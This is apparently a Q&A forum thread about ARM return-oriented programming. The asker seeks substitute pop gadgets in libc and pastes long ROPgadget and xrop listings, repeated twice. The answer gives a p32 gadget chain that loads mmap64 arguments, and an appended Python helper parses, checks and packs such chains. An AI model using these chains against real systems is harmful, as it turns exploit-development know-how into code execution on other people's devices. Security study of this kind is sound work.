ROP Programming / Exploitation on ARM - Gadget Chain

7

Unfortunately, I cannot find this gadget in my libc.so. How can we reprogram it using different instructions:

pop {r0, r1, r2, r3, pc}

Which instructions would achieve the same? Which gadgets should I look for?

It refers to this exploit:

# pivot swaps stack then returns to pop {pc}
  page += p32(pop_r0_r1_r2_r3_pc)

Thanks,

Update:

These gadgets are available in my libc.so:

Which tool is better, ROPgadget or xrop? xrop certainly showed more gadgets.

ROPgadget --binary libc.so --ropchain --only "pop"
Gadgets information
============================================================
0x0001061c : pop {r0, pc}
0x00042664 : pop {r1, pc}
0x00042d00 : pop {r3, pc}
0x0000f7dc : pop {r4, pc}
0x00041658 : pop {r4, r5, pc}
0x0004198c : pop {r4, r5, r6, pc}
0x00042c2c : pop {r4, r5, r6, r7, pc}

And using xrop:

Usage: xrop [-r arch] [-b bits] [-e bytes] [-l endian] [-a relocaddr] [-s regex] [-v] [-h] inputfile
     -b (16 | 32 | 64) sets the processor mode
     -r (arm | mips | powerpc | x86) raw binary file of given architecture
     -v displays the version number
     -l (b | e) big or little endian
     -e skips <bytes> of header
     -a rellocate at given address
     -n disable colors in the output
     -s filter gadgets with <regex>
     -h prints this menu

$ ./xrop -r arm -b 32 -l b  -s pop libc.so
> 0x19474               rsbmi   r4, r8, r8, ror #18
0x19478                 andsmi  r5, sl, #134217729  ; 0x8000001
0x1947c                 mvnpl   r0, #0, 4
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________

> 0x230cc               mvnseq  r0, #-1073741814    ; 0xc000000a
0x230d0                 ldrdeq  pc, [sl], -r1   
0x230d4                 ldreq   r2, [r1, #2400]!    ; 0x960
0x230d8                 popcc   {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________

> 0x2f1f0               rsbmi   r0, r1, #1073741848 ; 0x40000018
0x2f1f4                 popeq   {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8                 teqeq   r3, r7, ror #10
0x2f1fc                 mrc2    10, 6, fp, cr12, cr8, {4}
_______________________________________________________________

> 0x3e520               ldrdls  r0, [r2, #-8]
0x3e524                 popcc   {r3, r6, r8, sl}
0x3e528                 eoreq   r7, r1, r4, asr #16
0x3e52c                 ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________

> 0x3e664               ldrdls  r0, [r2, #-8]
0x3e668                 popcc   {r3, r6, r8, sl}
0x3e66c                 eoreq   r7, r1, r4, asr #16
0x3e670                 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________

> 0x40244               svcmi   0x00f0ff30
0x40248                 popeq   {r0, r2, r4, r5, r7, fp}
0x4024c                 ldrhteq r3, [r1], r9
_______________________________________________________________

> 1 + 0x1a84            movs    r2, r2
1 + 0x1a86              movs    r0, r1
1 + 0x1a88              asrs    r7, r7, #15
1 + 0x1a8a              movs    r0, r0
1 + 0x1a8c              pop {r0, r1, r2, r6, pc}
_______________________________________________________________

> 1 + 0xfb60            subs    r7, #192    ; 0xc0
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0xfb5e            tst.w   r5, #98304  ; 0x18000
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x119e6           pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11a46           pop {r0, r2, r4, r5, r7}
1 + 0x11a48             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11c2e           pop {r2, r3, r4, r6, r7}
1 + 0x11c30             lsrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x12db0           pop {r0, r1, r3, r4, r5}
1 + 0x12db2             movs    r0, #0
1 + 0x12db4             strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x21c72           subs    r0, r0, r4
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6e           cmp r3, #17
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6c           vmov    d1, r2, r3
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2db40           pop {r0, r3, r4, r5}
1 + 0x2db42             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc90           lsrs    r4, r2, #12
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc8e           vmov    d4, r0, r1
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x4ea9a           cbnz    r0, 0x4eacc
1 + 0x4ea9c             cbnz    r2, 0x4eb0e
1 + 0x4ea9e             pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________

> 1 + 0x5954c           movs    r0, r0
1 + 0x5954e             movs    r0, r1
1 + 0x59550             movs    r1, r3
1 + 0x59552             movs    r0, r0
1 + 0x59554             pop {r0, r1, r2, r6}
_______________________________________________________________

> 1 + 0x6b1cc           movs    r2, r2
1 + 0x6b1ce             movs    r0, r1
1 + 0x6b1d0             ldrsh   r3, [r7, r4]
1 + 0x6b1d2             movs    r0, r0
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
_______________________________________________________________

$ ./xrop -r arm -b 64 -l b  -s pop libc.so
> 0x19474               rsbmi   r4, r8, r8, ror #18
0x19478                 andsmi  r5, sl, #134217729  ; 0x8000001
0x1947c                 mvnpl   r0, #0, 4
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________

> 0x230cc               mvnseq  r0, #-1073741814    ; 0xc000000a
0x230d0                 ldrdeq  pc, [sl], -r1   
0x230d4                 ldreq   r2, [r1, #2400]!    ; 0x960
0x230d8                 popcc   {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________

> 0x2f1f0               rsbmi   r0, r1, #1073741848 ; 0x40000018
0x2f1f4                 popeq   {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8                 teqeq   r3, r7, ror #10
0x2f1fc                 mrc2    10, 6, fp, cr12, cr8, {4}
_______________________________________________________________

> 0x3e520               ldrdls  r0, [r2, #-8]
0x3e524                 popcc   {r3, r6, r8, sl}
0x3e528                 eoreq   r7, r1, r4, asr #16
0x3e52c                 ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________

> 0x3e664               ldrdls  r0, [r2, #-8]
0x3e668                 popcc   {r3, r6, r8, sl}
0x3e66c                 eoreq   r7, r1, r4, asr #16
0x3e670                 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________

> 0x40244               svcmi   0x00f0ff30
0x40248                 popeq   {r0, r2, r4, r5, r7, fp}
0x4024c                 ldrhteq r3, [r1], r9
_______________________________________________________________

> 1 + 0x1a84            movs    r2, r2
1 + 0x1a86              movs    r0, r1
1 + 0x1a88              asrs    r7, r7, #15
1 + 0x1a8a              movs    r0, r0
1 + 0x1a8c              pop {r0, r1, r2, r6, pc}
_______________________________________________________________

> 1 + 0xfb60            subs    r7, #192    ; 0xc0
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0xfb5e            tst.w   r5, #98304  ; 0x18000
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x119e6           pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11a46           pop {r0, r2, r4, r5, r7}
1 + 0x11a48             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11c2e           pop {r2, r3, r4, r6, r7}
1 + 0x11c30             lsrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x12db0           pop {r0, r1, r3, r4, r5}
1 + 0x12db2             movs    r0, #0
1 + 0x12db4             strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x21c72           subs    r0, r0, r4
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6e           cmp r3, #17
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6c           vmov    d1, r2, r3
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2db40           pop {r0, r3, r4, r5}
1 + 0x2db42             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc90           lsrs    r4, r2, #12
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc8e           vmov    d4, r0, r1
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x4ea9a           cbnz    r0, 0x4eacc
1 + 0x4ea9c             cbnz    r2, 0x4eb0e
1 + 0x4ea9e             pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________

> 1 + 0x5954c           movs    r0, r0
1 + 0x5954e             movs    r0, r1
1 + 0x59550             movs    r1, r3
1 + 0x59552             movs    r0, r0
1 + 0x59554             pop {r0, r1, r2, r6}
_______________________________________________________________

> 1 + 0x6b1cc           movs    r2, r2
1 + 0x6b1ce             movs    r0, r1
1 + 0x6b1d0             ldrsh   r3, [r7, r4]
1 + 0x6b1d2             movs    r0, r0
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
_______________________________________________________________
    
posted by android_dev 28.09.2015 - 21:26

1 answer

2

I haven't looked for long, but using xrop's result 1 + 0x59554 : pop {r0, r1, r2, r6} and ROPgadget's result 0x00042d00 : pop {r3, pc}, have you tried doing this in the ROP stack?

page += p32(pop_r0_r1_r2_r6_pc) #xrop result with loaded offset
page += p32(r0_popval)  #r0 - mmap() address in exploit.
page += p32(r1_popval)  #r1 - size in exploit.
page += p32(r2_popval)  #r2 - protection in exploit.
page += p32(r6_popval)  #r6 - 0x66666666 looks just like recognizable junk.
page += p32(pop_r3_pc)  #ROPgadget result with loaded offset
page += p32(r3_popval)  #r3 - flags for mmap in exploit.
page += p32(mmap64_address)     #for popping into pc to call mmap64(). 

I guess it would do fine if they are valid gadgets. Consider Thumb gadgets as well if you have decent gadgets for branching and switching between the modes.

I have learned similar material, for which ROPgadget went all well, but I would suggest using any other ready feature to get what needs to be done faster. I would for example like automated ARM ropchain generation in ROPgadget, but it is not a feature.

    
answered 17.03.2017 - 05:52
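As an added example (not code from the question or the answer), a small Python helper that parses gadget lines in the two tools' listing formats and sanity-checks the proposed order before it is tried: it reads xrop's "1 + " prefix as a Thumb marker (my assumption), rejects conditional pops such as popeq, flags a gadget that does not pop pc (the answer's pop {r0, r1, r2, r6} at 0x59554 would fall through rather than chain), and lays out the stack words with p32. The register values, libc base and final address are constructed.

```python
import re
import struct

# Constructed sample input: gadget lines exactly as ROPgadget and xrop
# print them in the question above.
ROPGADGET_LINE = "0x00042d00 : pop {r3, pc}"
XROP_LINE = "1 + 0x59554             pop {r0, r1, r2, r6}"
XROP_LINE_PC = "1 + 0x1a8c              pop {r0, r1, r2, r6, pc}"

GADGET_RE = re.compile(r"\s*(1 \+ )?(0x[0-9a-f]+)\s*:?\s*pop\s*\{([^}]*)\}", re.I)

def parse_gadget(line):
    """Parse one ROPgadget or xrop listing line into (address, regs, thumb).
    Only an unconditional 'pop {...}' is accepted; conditional forms such as
    popeq only fire for a matching flag state and are rejected.
    xrop's '1 + ' prefix is taken to mark a Thumb gadget (assumption), so the
    low bit is folded into the address to make the branch switch to Thumb."""
    m = GADGET_RE.match(line)
    if not m:
        raise ValueError("not an unconditional pop gadget: %r" % line)
    thumb = m.group(1) is not None
    addr = int(m.group(2), 16) | (1 if thumb else 0)
    regs = [r.strip() for r in m.group(3).split(",")]
    return addr, regs, thumb

def check_chain(gadgets, needed=("r0", "r1", "r2", "r3")):
    """Return the problems with a proposed gadget order: every gadget except
    the last must pop pc (otherwise execution falls through into whatever
    follows it instead of the next gadget), and the popped registers together
    must cover the argument registers the call needs."""
    problems = []
    for addr, regs, _ in gadgets[:-1]:
        if "pc" not in regs:
            problems.append("%#x does not pop pc; the next gadget is never reached" % addr)
    popped = {r for _, regs, _ in gadgets for r in regs}
    missing = [r for r in needed if r not in popped]
    if missing:
        problems.append("registers never set: " + ", ".join(missing))
    return problems

def p32(value):
    return struct.pack("<I", value & 0xFFFFFFFF)

def build_chain(gadgets, values, final, base=0, junk=0x66666666):
    """Lay out the stack words: each gadget address (plus the libc load base),
    then one word per popped register in pop order, pc excluded because the
    following gadget's address (or `final`) lands there."""
    chain = b""
    for addr, regs, _ in gadgets:
        chain += p32(base + addr)
        chain += b"".join(p32(values.get(r, junk)) for r in regs if r != "pc")
    return chain + p32(final)
```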
